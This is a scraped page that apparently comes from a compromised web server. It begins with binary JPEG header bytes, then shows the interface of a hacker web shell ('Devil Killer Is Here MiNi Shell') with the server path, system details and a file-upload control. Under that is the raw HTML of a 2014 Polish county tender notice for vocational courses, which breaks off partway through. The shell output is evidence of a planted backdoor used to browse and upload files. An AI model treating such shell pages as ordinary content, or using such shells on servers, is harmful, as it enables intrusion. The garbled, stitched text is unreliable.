JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140422/135332-N-2014.html

<p class="kh_header"><b>Brzesko: Realizacja kursów zawodowych ekonomiczno-handlowych w ramach projektu - Modernizacja  kształcenia zawodowego w Małopolsce</b><br>
<b>Numer ogłoszenia: 135332 - 2014; data zamieszczenia: 22.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Brzesku , ul. Głowackiego 51, 32-800 Brzesko, woj. małopolskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatbrzeski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja kursów zawodowych ekonomiczno-handlowych w ramach projektu - Modernizacja  kształcenia zawodowego w Małopolsce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest realizacja kursów z branży ekonomiczno-handlowej. Kursy przeprowadzone będą dla uczniów szkół ponadgimnazjalnych, dla których organem prowadzącym jest Powiat Brzeski, a które uczestniczą w projekcie - Modernizacja kształcenia zawodowego 
w Małopolsce. Przedmiot zamówienia podzielony został na części (Zadania) tj.

Zadanie 1: Kurs fakturowania i obsługi kas fiskalnych dla uczniów w ZSP nr 2 w Brzesku.

Zadanie 2: Kurs kasjer fakturzysta z obsługą kas fiskalnych dla ZSP w Czchowie

Zadanie 3: Kurs specjalista do spraw kadr i płac dla  uczniów ZSP w Czchowie.

Zadanie 4: : Kurs obsługi programów magazynowych dla uczniów ZSP nr 1 w Brzesku.

Zadanie 5: Kurs kadry i płace dla ZSP nr 1 w Brzesku.

Zadanie 6: Kurs specjalista ds. funduszy unijnych dla ZSP nr 1 w Brzesku.

Zadanie 7: Kurs obsługa nowoczesnych urządzeń IT stosowanych w handlu dla ZSP nr 1 w Brzesku.

Zadanie 8: Kurs florystyczny I stopnia dla uczniów ZSP nr 1 w Brzesku.

Zadanie 9: Kurs obsługi kas fiskalnych dla ZS w Szczurowej.

Zadanie 10: Kurs florystyczny I stopnia dla uczniów grupy I ZS w Szczurowej.

Zadanie 11: Kurs florystyczny I stopnia dla uczniów grupy II ZS w Szczurowej.

Zadanie 12: Kurs kreacji wizerunku dla uczniów Zespołu Szkół Technicznych i Ogólnokształcących 
w Łysej Górze.



Szczegółową specyfikację każdej z części (Zadania) zawarto w załączniku nr 1 do Specyfikacji Istotnych Warunków Zamówienia(Opis przedmiotu zamówienia).

Kursy realizowane są w ramach projektu - Modernizacja kształcenia zawodowego w Małopolsce, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.

2.	Szczegółowe wymagania Zamawiającego wobec Wykonawcy w ramach realizacji każdej z części niniejszego zamówienia:

1)	Zamawiający dopuszcza składanie ofert częściowych w podziale na w/w Zadania. Szczegółowy opis poszczególnych części zamówienia zawarto w załączniku nr 1 do SIWZ.
2)	Na co najmniej 3 dni przed rozpoczęciem kursu, Wykonawca będzie zobligowany przekazać do Zamawiającego planowany harmonogram spotkań zawierający daty i godziny prowadzonych zajęć wraz z tematami rozpisanymi zgodnie z tematyką kursu opisaną w zał. nr 1 do SIWZ. 
W przypadku realizacji Zadania 9 tzn. kursu wyjazdowego harmonogram taki musi zawierać ponadto inne istotne informację organizacyjne w szczególności informacje o godzinach wyjazdu 
i powrotu, godzinach i miejscach przeznaczonych na posiłki, miejscach noclegowych.

Szczegółowy harmonogram realizacji zadania musi być uzgodniony(podpisany) z liderem szkolnym projektu i Dyrektorem Szkoły. Harmonogram powinien być dostosowany do zajęć szkolnych uczniów oraz nie kolidować z innymi wydarzeniami jak uroczystości szkolne, akademie, wycieczki szkolne.
3)	Na potrzeby niniejszego postępowania za termin ,,godzina,, należy przyjąć, iż jedna godzina jest równa 60 minut, za termin ,,godzina lekcyjna,, należy przyjąć, iż jedna godzina lekcyjna jest równa 45 minut.
4)	Zamawiający wymaga aby szkolenia planowane były zgodnie z wytycznymi określonymi 
w załączniku nr 1 do SIWZ.
5)	Sale i pracownie przewidziane na realizację kursu w danej szkole udostępnia się Wykonawcy
nieodpłatnie w zakresie wyszczególnionym w załączniku nr 1 do SIWZ. Kursy odbywać się będą na terenie szkół, zgodnie z nazwą szkoły zawartą w nazwie danej części (zadania), za wyjątkiem Zadania 9 w ramach którego kurs jest wyjazdowy, realizowany poza siedzibą szkoły.   
6)	Wykonawca może w trakcie przeprowadzania kursu korzystać z pomocy dydaktycznych będących własnością szkoły wyszczególnionych w specyfikacji - w załączniku nr 1 do SIWZ, przy czym odpowiada on za wszelkie uszkodzenia powstałe na wskutek niewłaściwego ich użytkowania. Dyrektor lub osoba przez niego upoważniona udostępnia sprzęt oraz dokonuje sprawdzenia jego stanu w obecności Wykonawcy każdorazowo przed rozpoczęciem i po zakończeniu zajęć. Pozostały sprzęt niezbędny do realizacji zadania Wykonawca musi zorganizować na swój koszt.
7)	Wszystkie przekazywane przez Wykonawcę uczestnikom kursu materiały szkoleniowe, dydaktyczne lub jakiekolwiek produkty muszą być nowe, nieużywane i oryginalnie zapakowane.
8)	Wykonawca zobowiązuje się do bieżącego informowania Zamawiającego faksem, e-mailem lub pisemnie (najpóźniej w drugim dniu roboczym po zajęciach) o każdej nieobecności uczestnika na danym spotkaniu.
9)	Wykonawca po zakończeniu kursu przeprowadzi wśród uczestników zajęć ocenę merytoryczną i techniczną  przebiegu kursu na podstawie anonimowej ankiety oceniającej. 
10)	Wykonawca jest zobowiązany prowadzić odpowiednią dokumentację w postaci: dziennika kursu - w dzienniku tym Wykonawca będzie zobowiązany w szczególności umieścić: imiona 
i nazwiska osób szkolonych, plan kursu (tematyka i odpowiedni wymiar godzin), realizacja planu kursu (data, liczba godzin zajęć, liczba osób obecnych, treść zajęć, podpis prowadzącego zajęcia), sprawozdanie ze szkolenia (liczba osób rozpoczynających i kończących szkolenie, liczba wydanych zaświadczeń), list przekazanych posiłków, materiałów biurowych, szkoleniowych/skryptów oraz wszelkich innych dokumentów i pomocy jeśli wymaga tego specyfikacja kursu określona szczegółowo w załączniku nr 1 do SIWZ, a także listy odbioru wydanych zaświadczeń. Sporządzając listy przekazania uczniom wszelkich zaświadczeń, przedmiotów czy produktów (w tym wyżywienia) Wykonawca musi uzyskać podpis każdego ucznia potwierdzający jego faktyczny odbiór. Brak takiego podpisu jest dla Zamawiającego jednoznaczny z nie przekazaniem przedmiotu o którym mowa wyżej.
11)	Każdy z uczestników zajęć posiadający min 80% obecności otrzyma zaświadczenie potwierdzające ukończenie kursu. Uczniowie, którzy uczestniczyli w kursie, ale mają poniżej 80 % obecności otrzymają zaświadczenie o uczestnictwie. Na zaświadczeniu o ukończeniu winny zostać umieszczone: szczegółowy zakres programowy kursu (wraz z podaniem ilości godzin poszczególnych tematów zajęć), logo projektu - wg wzoru przekazanego przez Lidera szkolnego na etapie realizacji zamówienia, zapis właściwy dla nazwy kursu występujący w nazwie każdego zadania tj.: np. dla Zadania 1:  Kurs fakturowania i obsługi kas fiskalnych dla uczniów w ZSP nr 2 w Brzesku, będzie to sentencja:
,,Kurs fakturowania i obsługi kas fiskalnych współfinansowany przez Unię Europejską z Europejskiego Funduszu Społecznego w ramach projektu pn. Modernizacja kształcenia zawodowego w Małopolsce,,.
12)	W przypadku śmierci lub rezygnacji uczestnika Wykonawca zamiast zaświadczeń o ukończeniu / uczestnictwie w zajęciach, o których mowa punkcie 11 przekaże Zamawiającemu oświadczenie ze wskazaniem powodu przerwania kursu danego uczestnika. 
13)	W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do: 
a)	oznakowania sal, w których będą odbywały się zajęcia, zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
b)	poinformowania w pierwszym dniu zajęć uczestników o fakcie współfinansowania zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
c)	stosowania na wszystkich dokumentach w trakcie wykonywania przedmiotowego zamówienia znaków takich jak: logo POKL, logo Unii Europejskiej wraz z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego, logo Województwa Małopolskiego, logo projektu, logo powiatu brzeskiego, hasło promocyjne POKL. 
14)	Zamawiający wymaga, aby Wykonawca zapewnił na własność każdemu uczestnikowi zajęć:
a)	materiały szkoleniowe / skrypty potrzebne do realizacji zajęć, 
b)	materiały biurowe w postaci: zeszyt w formacie A4 w kratkę, min. 96 kartek twarda oprawa, ołówek automatyczny z gumką, komplet czterech długopisów z zatyczką w 4 różnych kolorach oraz teczkę w twardej oprawie o grubości grzbietu min. 2 centymetrów. 
c)	dla Zadania 1 do 7 włącznie pamięć pen-drive o pojemności min. 2 GB 
15)	Zamawiający wymaga by Wykonawca na swój koszt zapewnił podczas prowadzenia zajęć 
(na każdym spotkaniu) każdemu uczestnikowi posiłek w postaci:
a)	drożdżówki o masie min 85g. i napoju lub soku owocowego, niegazowanego 
o pojemności min. 200 ml. jeśli spotkanie w danym dniu trwa do 4 godzin.
b)	obiadu w skład którego wejdzie cieple danie (nie dopuszcza się posiłków przygotowanych na zasadzie zalewania wodą produktów sproszkowanych) 
o min. 250 kcal oraz kompotu lub soku w ilości min. 200 ml. jeśli spotkanie 
w danym dniu trwa 4 i więcej godzin.
c)	Określonej szczegółowo w załączniku nr 1 do SIWZ w przypadku realizacji Zadania 9 tj. kursu wyjazdowego.

Posiłki muszą być świeże i przygotowane zgodnie z zachowaniem obowiązujących przepisów dot. higieny żywienia i żywności.  

16)	Zajęcia mogą być planowane tylko jako wielokrotność pełnych godzin (tj. odpowiednio 60 min, 120 min, 180 min. itd.), dla Zadania 1, Zadania 4 Zadania 6, Zadania 7 oraz Zadania 12, a dla Zadania 2, Zadania 3, Zadania 5, Zadania 8, Zadania 10 oraz Zadania 11 z uwagi, na fakt, iż dla tych Zadań czas trwania kursu został określony w godzinach lekcyjnych to zajęcia planowane mogą być odpowiednio jako wielokrotność godzin lekcyjnych (tj. 45 min, 90 min, 135 min. itd.).

17)	W salach i pracowniach, podczas prowadzenia zajęć bez zgody koordynatora powiatowego nie mogą przebywać inne osoby niż uczestnicy kursu oraz osoby szkolące (instruktorzy, wykładowcy).

18)	Wykonawca po zakończeniu zajęć jest zobowiązany przekazać Zamawiającemu kserokopie zaświadczeń / certyfikatów, o których mowa w Rozdz. III ust. 2 pkt 11 oraz oryginałów dokumentów, o których mowa w punktach 9, 10 i 12 SIWZ.

19)	 Wykonawca zapewni ubezpieczenie wszystkich uczestników kursów od następstw nieszczęśliwych wypadków (każda osoba musi być ubezpieczona na kwotę min. 10.000 zł na okres trwania kursu). Wykonawca musi posiadać polisę potwierdzającą objęcie uczestników takim ubezpieczeniem oraz przedstawić jej kserokopię Zamawiającemu najpóźniej w dniu rozpoczęcia kursu.

20)	Zamawiający zastrzega sobie prawo do pełnej kontroli przeprowadzanych kursów, także do sporządzania zdjęć oraz wszelkiej dokumentacji obrazującej realizację przedmiotu umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zamowienia.powiatbrzeski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Brzesku
Wydział Edukacji 
(Ip., pok. 120)
ul. Piastowska 2B
32-800 Brzesko.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2014 godzina 10:00, miejsce: Starostwo Powiatowe w Brzesku
Sekretariat (IIp., pok. 213)
ul. Głowackiego 51
32-800 Brzesko.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt: Modernizacja kształcenia zawodowego w Małopolsce. Projekt w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 9.2, współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1: Kurs fakturowania i obsługi kas fiskalnych dla uczniów w ZSP nr 2 w Brzesku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników kursu - 12 uczniów.

2.	Czas trwania kursu wynosi: 60 godzin, w tym 20 godzin zajęć teoretycznych i 40 godzin zajęć praktycznych.

3.	Kurs musi uwzględniać w części teoretycznej, co najmniej tematy: Przepisy prawne związane z zawodem sprzedawcy - przegląd aktów prawnych, odpowiedzialność sprzedawcy, kasjera, postępowanie z falsyfikatami. Elementy towaroznawstwa handlowego - klasyfikacja rodzajowa i systematyka towarów, istota kodowania towarów, kodowanie towarów w Polsce i świecie, czynniki determinujące jakość towarów, cykl życia towaru, zmiany jakościowe w towarach spowodowane czasem, czynniki działające destrukcyjnie na towary, ochrona jakości towarów w transporcie i magazynowaniu, narażenia magazynowe i transportowe, zasady przechowywania wybranych grup towarowych, kontrola warunków klimatycznych, Dokumentacja handlowa (zamówienia, oferty, umowy, dokumentacja związana z dostawą, dokumentacja związana ze sprzedażą, dokumentacja magazynowa, reklamacje i zwroty), rozliczenia i dokumentacja finansowa (rozliczenia gotówkowe, znaki pieniężne - klasyfikacja, identyfikacja, zabezpieczenia, rozliczenia bezgotówkowe za pomocą czeków, rodzaje czeków, zasady rozliczania, rozliczenia bezgotówkowe za pomocą kart płatniczych, rodzaje kart, zasady rozliczania, kasy fiskalne jako szczególna forma dokumentacji sprzedaży, rozliczenie i odprowadzanie utargów, dokumentacja finansowa sprzedaży, faktury, paragony), Dokumentacja wymiany zagranicznej (formy wymiany i rozliczeń, organizacja i dokumentacja dostaw, dokumentacja celna i podatkowa, dokumentacja w handlu zagranicznym),                    Części praktyczna kursu obejmie co najmniej:  obsługa kas fiskalnych - rodzaje i zastosowanie urządzeń fiskalnych, programowanie kas fiskalnych, praktyczne ćwiczenia sprzedaży z zastosowaniem kasy fiskalnej, transmisja danych z kas fiskalnych do programów magazynowych i księgowych, rozpoznawanie i kontrola znaków pieniężnych, kasy fiskalne jako szczególna forma dokumentacji sprzedaży - omówienie ustawy, komputerowy program do fakturowania - ewidencja kontrahentów, ewidencja towarów, cen i marż, rejestr sprzedaży i zakupów, kontrola stanów magazynowych.

Szczegółowy opis kursu zawarto w załączniku nr 1 do Specyfikacji Istotnych Warunków Zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2: Kurs kasjer fakturzysta z obsługą kas fiskalnych dla ZSP w Czchowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników kursu - 10 uczniów.

2.	Czas trwania kursu wynosi: 60 godzin lekcyjnych, w tym 20 godzin zajęć teoretycznych i 40 godzin zajęć praktycznych.


3.	Kurs musi uwzględniać w części teoretycznej, co najmniej tematy: Przepisy prawne związane z zawodem sprzedawcy - przegląd aktów prawnych, odpowiedzialność sprzedawcy, kasjera, postępowanie z falsyfikatami, Elementy towaroznawstwa handlowego - klasyfikacja rodzajowa i systematyka towarów, istota kodowania towarów, kodowanie towarów w Polsce i świecie, czynniki determinujące jakość towarów,  cykl życia towaru, zmiany jakościowe w towarach spowodowane czasem, czynniki działające destrukcyjnie na towary, ochrona jakości towarów w transporcie i magazynowaniu, narażenia magazynowe i transportowe, zasady przechowywania wybranych grup towarowych, kontrola warunków klimatycznych, Dokumentacja handlowa (zamówienia, oferty, umowy, dokumentacja związana z dostawą, dokumentacja związana ze sprzedażą, dokumentacja magazynowa, reklamacje i zwroty), rozliczenia i dokumentacja finansowa (rozliczenia gotówkowe, znaki pieniężne - klasyfikacja, identyfikacja, zabezpieczenia, rozliczenia bezgotówkowe za pomocą czeków, rodzaje czeków, zasady rozliczania, rozliczenia bezgotówkowe za pomocą kart płatniczych, rodzaje kart, zasady rozliczania, kasy fiskalne jako szczególna forma dokumentacji sprzedaży, rozliczenie i odprowadzanie utargów, dokumentacja finansowa sprzedaży, faktury, paragony), Dokumentacja wymiany zagranicznej (formy wymiany i rozliczeń, organizacja i dokumentacja dostaw, dokumentacja celna i podatkowa, dokumentacja w handlu zagranicznym) Części praktyczna kursu obejmie, co najmniej: obsługa kas fiskalnych - rodzaje i zastosowanie urządzeń fiskalnych, programowanie kas fiskalnych, praktyczne ćwiczenia sprzedaży z zastosowaniem kasy fiskalnej, transmisja danych z kas fiskalnych do programów magazynowych i księgowych, rozpoznawanie i kontrola znaków pieniężnych, kasy fiskalne jako szczególna forma dokumentacji sprzedaży- omówienie ustawy, komputerowy program do fakturowania - ewidencja kontrahentów, ewidencja towarów, cen i marż, rejestr sprzedaży i zakupów, kontrola stanów magazynowych.

Szczegółowy opis kursu zawarto w załączniku nr 1 do Specyfikacji Istotnych Warunków Zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3: Kurs specjalista do spraw kadr i płac dla  uczniów ZSP w Czchowie.</p>
